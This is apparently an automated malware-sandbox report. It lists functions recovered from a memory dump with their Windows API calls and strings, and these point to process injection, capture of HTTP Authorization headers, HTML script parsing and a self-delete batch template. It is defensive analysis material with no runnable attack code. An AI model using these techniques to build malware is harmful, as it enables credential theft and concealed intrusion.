Part of subcall function 0014F1A8: EnterCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1B8
Part of subcall function 0014F1A8: LeaveCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1E2

memcmp.MSVCRT ref: 001667F4

Part of subcall function 0016D95F: GetSystemTime.KERNEL32(?), ref: 0016D969

memcmp.MSVCRT ref: 00166859

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

memset.MSVCRT ref: 001668ED
memcpy.MSVCRT ref: 0016691A
memcmp.MSVCRT ref: 00166952

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014EE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 0014EE1C
memcpy.MSVCRT ref: 0014EE37
memcpy.MSVCRT ref: 0014EE5F
memcpy.MSVCRT ref: 0014EE83

Part of subcall function 0014EDAE: memcpy.MSVCRT ref: 0014EDF9

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00157DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,0014B9D5,00000003,?,00000000,00000000), ref: 00157E07
InterlockedIncrement.KERNEL32(?,?), ref: 00157E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,0014B9D5,00000003,?,00000000,00000000), ref: 00157E62

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014F5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

Part of subcall function 0016CFF2: memset.MSVCRT ref: 0016D01A

memcpy.MSVCRT ref: 0014F79E

Part of subcall function 0016D06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0016D07B

memcpy.MSVCRT ref: 0014F719
memcpy.MSVCRT ref: 0014F731

Part of subcall function 0016D17E: memcpy.MSVCRT ref: 0016D19E
Part of subcall function 0016D17E: memcpy.MSVCRT ref: 0016D1CA

memcpy.MSVCRT ref: 0014F78D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155AD5, Relevance: 6.3, APIs: 3, Instructions: 10

APIs

GetLastError.KERNEL32(?,0014BA1E), ref: 00155AD6
TlsSetValue.KERNEL32(00000000), ref: 00155AE6
SetLastError.KERNEL32(?,?,0014BA1E), ref: 00155AED

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00160181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 00173CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00173D14
Part of subcall function 00173CFF: lstrcmpA.KERNEL32(Basic ,?,001601C0,00000006,Authorization,?,?,?), ref: 00173D1E

StrChrA.SHLWAPI(?,0000003A), ref: 00160212

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Strings

Authorization, xrefs: 00160191
Basic , xrefs: 001601B6

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014A509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0014A54A

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

PathRenameExtensionW.SHLWAPI(?,?), ref: 0014A59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0014A56B

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014BBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 0014B6D0: EnterCriticalSection.KERNEL32(00183510,?,0014BBBB,00C01E90,?,00151983,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 0014B6E0
Part of subcall function 0014B6D0: LeaveCriticalSection.KERNEL32(00183510,?,00151983,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 0014B715

VerQueryValueW.VERSION(?,001475E4,?,?,00C01E90,?,00151983,?,?,?,?,?,?,001648EB), ref: 0014BBCE
GetModuleHandleW.KERNEL32(?), ref: 0014BC0F

Part of subcall function 0014BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 0014BC6B

Strings

4, xrefs: 0014BBD9

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001646CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0016470E

Part of subcall function 00173D5A: memcpy.MSVCRT ref: 00173D94

Part of subcall function 00164214: EnterCriticalSection.KERNEL32(00183510,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0016422E
Part of subcall function 00164214: LeaveCriticalSection.KERNEL32(00183510,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 00164261
Part of subcall function 00164214: CoTaskMemFree.OLE32(00000000), ref: 001642F6
Part of subcall function 00164214: PathRemoveBackslashW.SHLWAPI(?), ref: 00164303
Part of subcall function 00164214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0016431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 001646D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 001646EE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001593E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,00159326,?,?,00000000), ref: 00159412
memcpy.MSVCRT ref: 00159432
memcpy.MSVCRT ref: 0015946A
memcpy.MSVCRT ref: 00159482

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 00151BE7
#2.OLEAUT32(ProhibitDTD), ref: 00151BF5

Strings

ProhibitDTD, xrefs: 00151BF0

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014F20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 0014F219
memcpy.MSVCRT ref: 0014F23A
memcpy.MSVCRT ref: 0014F260
memcpy.MSVCRT ref: 0014F284

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00171E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0014CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00171E9C
memcmp.MSVCRT ref: 00171EC8
memcpy.MSVCRT ref: 00171F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00171F1F

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00161215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 0016122B
InitializeCriticalSection.KERNEL32(00182910), ref: 0016123B

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

memset.MSVCRT ref: 0016126A
InitializeCriticalSection.KERNEL32(001828F0), ref: 00161274

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015BFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 0015C0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 0015C10C

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

Part of subcall function 0015CC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 0015CDAF

Part of subcall function 00155A9B: GetLastError.KERNEL32(?,00000000,0015C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00155A9D
Part of subcall function 00155A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 00155ABA
Part of subcall function 00155A9B: SetLastError.KERNEL32(?,?,00000000,0015C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00155ACA

Part of subcall function 00155A4F: GetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A51
Part of subcall function 00155A4F: TlsGetValue.KERNEL32(?,?,0014B9B4), ref: 00155A6E
Part of subcall function 00155A4F: TlsSetValue.KERNEL32(00000001), ref: 00155A80
Part of subcall function 00155A4F: SetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A90

Part of subcall function 00155AD5: GetLastError.KERNEL32(?,0014BA1E), ref: 00155AD6
Part of subcall function 00155AD5: TlsSetValue.KERNEL32(00000000), ref: 00155AE6
Part of subcall function 00155AD5: SetLastError.KERNEL32(?,?,0014BA1E), ref: 00155AED

Part of subcall function 00157DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,0014B9D5,00000003,?,00000000,00000000), ref: 00157E07
Part of subcall function 00157DF0: InterlockedIncrement.KERNEL32(?,?), ref: 00157E5B
Part of subcall function 00157DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,0014B9D5,00000003,?,00000000,00000000), ref: 00157E62

Part of subcall function 00157E75: EnterCriticalSection.KERNEL32(00C0263C,00C02628,00000001,?,00C02628,0015C026,00000001,?), ref: 00157E8F
Part of subcall function 00157E75: LeaveCriticalSection.KERNEL32(00C0263C,?,?,?), ref: 00157EBE

Strings

d, xrefs: 0015BFE8
n, xrefs: 0015BFF5

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 0015908C

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

InternetReadFile.WININET(0015388E,?,00001000,?), ref: 001590DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001590BB

Part of subcall function 00156AAB: memcpy.MSVCRT ref: 00156AD1

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,0015388E,?,00000CCA,?,?,00000001), ref: 00159132

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001572C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00173993: memcpy.MSVCRT ref: 00173AA4

Part of subcall function 0014E524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 0014E534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 0015732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00157347
FlushFileBuffers.KERNEL32(?), ref: 00157361
SetEndOfFile.KERNEL32 ref: 0015737B

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0014E4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 0014E502

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00175A2D, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

GetTempFileNameW.KERNEL32(00000426,?,?,?), ref: 00175A84
PathFindFileNameW.SHLWAPI(?), ref: 00175A93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00175ACC
memcpy.MSVCRT ref: 00175AF1

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016FC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 0016FC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 0016FC99
memcmp.MSVCRT ref: 0016FCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 0016FD3F

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00172F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00172F9D
WSAEventSelect.WS2_32 ref: 00172FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 00172FFE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014E141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 0014E16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 0014E1A6

Part of subcall function 0014DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,0014E138,?,?,?,?,?,00000009,00000000), ref: 0014DE7E
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DEEF
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DF13
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DF2A
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DF4A
Part of subcall function 0014DE64: LeaveCriticalSection.KERNEL32 ref: 0014DF65

LeaveCriticalSection.KERNEL32(?,?,00147854,?,000000FF,00000000), ref: 0014E1CC

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

GlobalUnlock.KERNEL32 ref: 0014E1D3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001706B6, Relevance: 6.1, APIs: 4, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 001706D4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00170709
RegCloseKey.ADVAPI32(?), ref: 00170718
RegCloseKey.ADVAPI32(?), ref: 00170733

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016FBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,0016FEB0,?,?,?,?,00000002), ref: 0016FBF4
GetTickCount.KERNEL32 ref: 0016FC27
memcpy.MSVCRT ref: 0016FC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,0016FEB0,?,?,?,?,00000002), ref: 0016FC6C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014C86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

DeleteCriticalSection.KERNEL32(?,?,?,?,0014C856), ref: 0014C8C2

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

CloseHandle.KERNEL32 ref: 0014C8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,0014C856), ref: 0014C8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,0014C856), ref: 0014C8F0

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014AA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetTickCount.KERNEL32 ref: 0014AA11
GetLastInputInfo.USER32(?), ref: 0014AA24
GetLocalTime.KERNEL32(?), ref: 0014AA48

Part of subcall function 0016D979: SystemTimeToFileTime.KERNEL32(?,?), ref: 0016D983

GetTimeZoneInformation.KERNEL32(?), ref: 0014AA60

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00152F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 00152F6C
TranslateMessage.USER32(?), ref: 00152F90
DispatchMessageW.USER32(?), ref: 00152F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00152FAB

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015E1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 0015568C: TlsSetValue.KERNEL32(00000001,0015E1BD), ref: 00155699

Part of subcall function 0016BEE3: CreateMutexW.KERNEL32(00182974,00000000,?), ref: 0016BF05

Part of subcall function 00164B8D: WaitForSingleObject.KERNEL32(00000000,0015E1D7), ref: 00164B95

GetCurrentThread.KERNEL32 ref: 0015E1DF
SetThreadPriority.KERNEL32 ref: 0015E1E6
WaitForSingleObject.KERNEL32(00001388), ref: 0015E1F8

Part of subcall function 00174181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001741A1
Part of subcall function 00174181: Process32FirstW.KERNEL32(?,?), ref: 001741C6
Part of subcall function 00174181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 0017421D
Part of subcall function 00174181: CloseHandle.KERNEL32 ref: 0017423B
Part of subcall function 00174181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00174257
Part of subcall function 00174181: memcmp.MSVCRT ref: 0017426F
Part of subcall function 00174181: CloseHandle.KERNEL32(?), ref: 001742E7
Part of subcall function 00174181: Process32NextW.KERNEL32(?,?), ref: 001742F3
Part of subcall function 00174181: CloseHandle.KERNEL32 ref: 00174306

WaitForSingleObject.KERNEL32(00001388), ref: 0015E211

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014DE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 0014DE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 0014DE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 0014DE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 0014DE52

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001713F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 00171418
getsockname.WS2_32(?,?,?), ref: 00171430
send.WS2_32(00000000,?,00000008,00000000), ref: 00171461

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 00156C23
connect.WS2_32 ref: 00156C40
closesocket.WS2_32 ref: 00156C4B

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00164CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 00164CC6

Part of subcall function 00150243: CryptDestroyKey.ADVAPI32 ref: 0015025A
Part of subcall function 00150243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 00150278

memset.MSVCRT ref: 00164D69

Part of subcall function 0015028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 001502B0

Part of subcall function 00149A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00149ACA
Part of subcall function 00149A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00149AEF

Part of subcall function 001502CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,00164D47), ref: 0015031F

Part of subcall function 00150223: CryptDestroyKey.ADVAPI32 ref: 00150235

Strings

\26}, xrefs: 00164CBE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016BE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

Part of subcall function 0016BAD3: memcpy.MSVCRT ref: 0016BAEE
Part of subcall function 0016BAD3: StringFromGUID2.OLE32(?), ref: 0016BB92

CreateMutexW.KERNEL32(00182974,00000001,?), ref: 0016BEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0016BEAC
CloseHandle.KERNEL32 ref: 0016BEBA

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,00172C15,?,00000000,?,00172CD1,?,?,?,?,00000000), ref: 0017292D
WSAEventSelect.WS2_32(?,?,00172CD1), ref: 00172943
WSACloseEvent.WS2_32(?), ref: 00172957

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016C3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(00147C5C), ref: 0016C3FC
lstrlenW.KERNEL32(?), ref: 0016C402

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

memcpy.MSVCRT ref: 0016C426

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001665F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 001665A9: StrCmpNIA.SHLWAPI ref: 001665C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 0016675C

Strings

script, xrefs: 00166669 00166693
nbsp;, xrefs: 00166754

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00157058, Relevance: 5.7, APIs: 3, Instructions: 82

APIs

Part of subcall function 0015DCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0015DD10
Part of subcall function 0015DCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 0015DD24
Part of subcall function 0015DCF8: CloseHandle.KERNEL32 ref: 0015DD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 0015708F

Part of subcall function 0015DD44: UnmapViewOfFile.KERNEL32 ref: 0015DD50
Part of subcall function 0015DD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,00000000), ref: 0015DD67

Part of subcall function 0014E524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 0014E534

SetEndOfFile.KERNEL32 ref: 00157105
FlushFileBuffers.KERNEL32(?), ref: 00157110

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

Part of subcall function 0014E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0014E594

Part of subcall function 00156F3F: GetFileAttributesW.KERNEL32(?), ref: 00156F50
Part of subcall function 00156F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 00156F85
Part of subcall function 00156F3F: MoveFileExW.KERNEL32(?,?,00000001), ref: 00156FCC
Part of subcall function 00156F3F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00156FE5
Part of subcall function 00156F3F: Sleep.KERNEL32(00001388), ref: 00157028
Part of subcall function 00156F3F: FlushFileBuffers.KERNEL32 ref: 00157036

Part of subcall function 0015DCB8: UnmapViewOfFile.KERNEL32 ref: 0015DCC4
Part of subcall function 0015DCB8: CloseHandle.KERNEL32 ref: 0015DCD7
Part of subcall function 0015DCB8: CloseHandle.KERNEL32 ref: 0015DCED

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 00156BC5
recv.WS2_32(?,?,?,00000000), ref: 00156BD5

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 00150730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00150767

Part of subcall function 00150643: memset.MSVCRT ref: 00150654

Part of subcall function 001503FD: GetCurrentProcess.KERNEL32 ref: 00150400
Part of subcall function 001503FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00150421
Part of subcall function 001503FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 0015042A

ResumeThread.KERNEL32(?), ref: 001507A8

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016D7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 0016D7BF

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0016D7FF
InternetCloseHandle.WININET(?), ref: 0016D80A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001645AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 001645D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 001645E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00164604

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00173629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 0017363C
GetLastError.KERNEL32(?,00155032,?,00000008,?,?,?,?,?,?,001649E1,?,?,00000001), ref: 00173646

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 0017366E

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00155020

Part of subcall function 00173629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 0017363C
Part of subcall function 00173629: GetLastError.KERNEL32(?,00155032,?,00000008,?,?,?,?,?,?,001649E1,?,?,00000001), ref: 00173646
Part of subcall function 00173629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 0017366E

GetTokenInformation.ADVAPI32(?,0000000C,00182968,00000004,?), ref: 00155048

